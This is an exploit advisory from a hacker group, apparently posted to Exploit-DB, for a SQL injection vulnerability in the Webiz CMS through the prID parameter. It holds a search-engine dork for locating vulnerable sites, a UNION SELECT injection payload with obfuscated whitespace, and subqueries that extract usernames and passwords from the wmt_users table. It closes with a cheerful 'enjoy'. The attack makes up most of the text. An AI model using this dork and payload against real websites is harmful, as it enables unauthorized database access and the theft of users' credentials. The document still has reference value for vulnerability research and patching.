@@@@@@ @@ @@ @@@@@ @@@@@ @@ @@@@ @@ @@@@@@ @@@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @ @@ @@ @@ @ @ @@ @ @@ @@@@@ @@ @@ @@@@@ @@ @@ @@ @@@@@ @@ @ @ @@ @@ @@ @@ @@ @@ @@ '' @@ @ @@ @@ @@ @ @ @@ @ @@ @@ @@ @@@@@ @@ @@ @@ @ @@ @@ @@ @@@ @@ @ VXA@HOTMAIL.FR zn@live.de VBHACKER.NET =========================================================================== WEBIZ SQL INJECTION VULNERABILITY =========================================================================== ============================================================================ ABOUT ME ============================================================================ == Found By : THE PIRATOR ---> AYMEN AHMADI == : kannibal615 ---> WALID TGS == website : www.vbhacker.net/vb == == email : vxa [at] hotmail [dot] fr == : zn [at] live [dot] de == == == Thanks to : Pc-InSeCt / emptyzero == : DAK / l3G3NDS / m0j4h3d == : V!Ru$_T4ckJ3n / __MiM0__ == : / PrideArabs / DIESEL == : ALL VBHACKER MEMBERS == ============================================================================ INFORMATIONS ============================================================================ == Developers : www.webiz.gr == vulner : SQL INJECTION == Bug : ../wmt/webpages/index.php == Variable1 : &prID= == Variable2 : &apprec= == == dork : Powered by Webiz inurl:'wmt/webpages' == ============================================================================ ============================================================================ EXPLOIT ============================================================================ == == Dork : Powered by Webiz inurl:'wmt/webpages' == == URL : ../wmt/webpages/index.php?lid=&pid=&prID=[Injection Here] == == Demo : http://localhost/wmt/webpages/index.php?lid=&pid=&prID=999.9' == == exploit : index.php?lid=&pid=&prID=-999.9/**/UNION/**/ALL/**/SELECT/**/1,2,3...,20-- == == database : MySQL 5 == ++ == == *** Insert This Code in THE VALID COLUMN *** ++ + == *** CHANGE [DATABASE_NAME] *** == == == == == USERNAME == == (SELECT/**/concat(cast(wmt_users.Username/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1) == == == == USER PASSWORD == == (SELECT/**/concat(cast(wmt_users.UserPassword/**/as/**/char))/**/FROM/**/[DATABASE_NAME].wmt_users/**/LIMIT/**/0,1) == ============================================================================= enjoy :) == Exploit-db.com == VBHACKER.NET/VB == kannibal615 Copyright (c) 2010